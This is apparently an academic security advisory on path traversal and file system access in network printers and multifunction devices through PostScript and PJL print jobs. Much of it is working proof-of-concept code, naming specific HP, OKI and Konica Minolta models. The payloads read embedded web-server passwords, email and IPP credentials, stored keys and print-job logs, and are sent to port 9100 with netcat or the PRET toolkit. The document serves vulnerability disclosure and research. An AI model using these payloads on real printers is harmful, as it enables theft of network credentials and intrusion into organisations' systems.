TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 2 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
accessing a printers file system through ordinary PostScript or PJL
based print jobs -- since decades a documented feature of both
languages. The attack can be performed by anyone who can print, for
example through USB or network. It can even be carried out by a
malicious website, using advanced cross-site printing techniques in
combination with a novel technique we call `CORS spoofing' (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

============[ File System Access with PostScript and PJL ]============

-------------------------[ Affected Devices ]-------------------------

Various printers are likely to be affected as the weakness is based on
PostScript and PJL, two generic printing languages supported by most
laser printers. In a test with 20 printers, a vast majority allowed
access to the file system using PostScript, however it was sandboxed to
a certain directory on most printers, which limits the impact. Devices
that are vulnerable to path traversal or where we could obtain sensitive
information are listed below:

- HP LaserJet 4200N (Firmware version: 20050602)
- HP LaserJet 4250N (Firmware version: 20150130)
- OKI MC342dn (Firmware version: A12.80_0_5)
- Konica Minolta bizhub C454e (Firmware: unknown)

Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

PJL and PostScript both offer legitimate file operations. On some
LaserJets, the whole file system can be accessed. This is a known issue
(see CVE-2010-4107 and CVE-2012-5221). In the HPSBPI02575 security
bulletin, HP promotes disabling file system access and setting a PJL
password as countermeasures. PJL passwords however can be cracked within
minutes due to their limited key size (1..65535). For PostScript, the
issue has been fixed in current firmware versions by limiting file
system access to a certain directory. The protection mechanism however
is flawed: By using %*% as disk prefix and replacing ../ with .././ the
whole file system can be accessed even for the latest firmware versions.
The impact is significant: Passwords for the embedded web server can be
found in /dev/rdsk_jdi_cfg0 while raw access to the RAM device available
via /dev/dsk_ram0. Proof-of-concept PostScript code tested on the HP
LaserJet 4250N is given below. It can be deployed to the printer using
netcat (`nc printer 9100').

----------------------------------------------------------------------
%!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% LIST ROOT DIRECTORY %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/str 256 string def (%*%.././../../**)
{print (\n) print} str filenameforall
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% OBTAIN EWS PASSWORD %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/byte (0) def
/infile (%*%.././../../dev/rdsk_jdi_cfg0) (r) file def
{ infile read {byte exch 0 exch put
(%stdout) (w) file byte writestring}
{infile closefile exit} ifelse
} loop
----------------------------------------------------------------------

The HP LaserJet 4250N furthermore contains a file named
webServer/config/soe.xml which holds the password to a user-set email
account for sending/receiving status information. Proof-of-concept PJL
code is given below (replace X by the size of the soe.xml file which is
obtained from the directory listing). Again, netcat can be used to
deploy the code to port 9100 of the printer.

----------------------------------------------------------------------
@PJL COMMENT "LIST CONFIG DIRECTORY"
@PJL FSDIRLIST NAME="0:\webServer\config" ENTRY=1 COUNT=65535
@PJL COMMENT "OBTAIN MAIL PASSWORD"
@PJL FSUPLOAD NAME="0:\webServer\config\soe.xml" OFFSET=0 SIZE=X

<listener name="email" port="110" secure="false"
class="hp.JetDirectPOP3Listener">
    <pop3server server="mail.company.com"/>
    <username user="someone"/>
    <password pwd="S3cret"/>
----------------------------------------------------------------------

The OKI MC342dn allows one level of path traversal, where a directory
called `hidden' is located which contains stored fax numbers, email
contacts and local users' PINs as well as the SNMP community string and
password. If the MFP is integrated into a network using features like
Email-to-Print or Scan-to-FTP the `hidden' directory also holds
passwords for LDAP, POP3, SMTP, out-bound HTTP proxy, FTP, SMB and
Webdav as well as the IPsec and Wi-Fi pre-shared keys. Example
PostScript code is given below.

----------------------------------------------------------------------
%!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% LIST HIDDEN DIRECTORY %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/str 256 string def (%*%../hidden/*)
{print (\n) print} str filenameforall
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% OBTAIN PASSWORD FILE %%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/byte (0) def
/infile
(../../../hidden/system/NIC_EJ1/slot1/configuration/latest/D63FB0.cfg)
(r) file def
{ infile read {byte exch 0 exch put
(%stdout) (w) file byte writestring}
{infile closefile exit} ifelse
} loop
----------------------------------------------------------------------

Note that the `hidden' directory on the OKI MC342dn does not appear in
PJL directory listings, however it can be accessed as in PostScript once
the name is known. Example PJL code is given below (where X is the
correct file size obtained from the directory listing).

----------------------------------------------------------------------
@PJL COMMENT "LIST CONFIG DIRECTORY"
@PJL FSDIRLIST NAME="0:/../hidden/system" ENTRY=1 COUNT=65535
@PJL COMMENT "OBTAIN IPP PASSWORDS"
@PJL FSUPLOAD NAME="0:/../hidden/system/ippuser.dat" OFFSET=0 SIZE=X
----------------------------------------------------------------------

On the Konica Minolta bizhub C454e, the contents of the root directory
can be listed using path traversal.

----------------------------------------------------------------------
@PJL COMMENT "LIST ROOT DIRECTORY"
@PJL FSDIRLIST NAME="0:/../../.." ENTRY=1 COUNT=65535
----------------------------------------------------------------------

In addition, the file ../sysdata/acc/job.csv can be read/written, which
contains logged print job metadata, including document titles and
usernames (X, again, is the correct file size obtained from the
directory listing).

----------------------------------------------------------------------
@PJL COMMENT "LIST ACCOUNTING DIRECTORY"
@PJL FSQUERY NAME="0:/../sysdata/acc"
@PJL COMMENT "OBTAIN ACCOUNTING DATA"
@PJL FSUPLOAD NAME="0:/../sysdata/acc/job.csv" OFFSET=0 SIZE=X
----------------------------------------------------------------------

-------------------------[ Proof of Concept ]-------------------------

To simplify PostScript and PJL based file system access on printers, a
Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. It can be used as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls ../..
d        -   Jan  1  1970 (created Jan  1  1970)  bootdev
d        -   Jan  1  1970 (created Jan  1  1970)  dsk_jdi
d        -   Jan  1  1970 (created Jan  1  1970)  dsk_jdi_ss
d        -   Jan  1  1970 (created Jan  1  1970)  dsk_ram0
d        -   Jan  1  1970 (created Jan  1  1970)  etc
d        -   Jan  1  1970 (created Jan  1  1970)  tmp
d        -   Jan  1  1970 (created Jan  1  1970)  webServer

The directory listing is obtained from a HP LaserJet 4200N printer.
Arbitrary files can be uploaded and downloaded. Similar functionality
can be achieved using PRET in PJL mode:

$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls ..
d        -   bootdev
d        -   dsk_jdi
d        -   dsk_jdi_ss
d        -   dsk_ram0
d        -   etc
d        -   lrt
d        -   tmp
d        -   webServer
d        -   xps

-----------------------[ Further Information ]------------------------

Information on this bug/feature of PostScript and PJL can be found at:
http://hacking-printers.net/wiki/index.php/File_system_access
http://hacking-printers.net/wiki/index.php/Credential_disclosure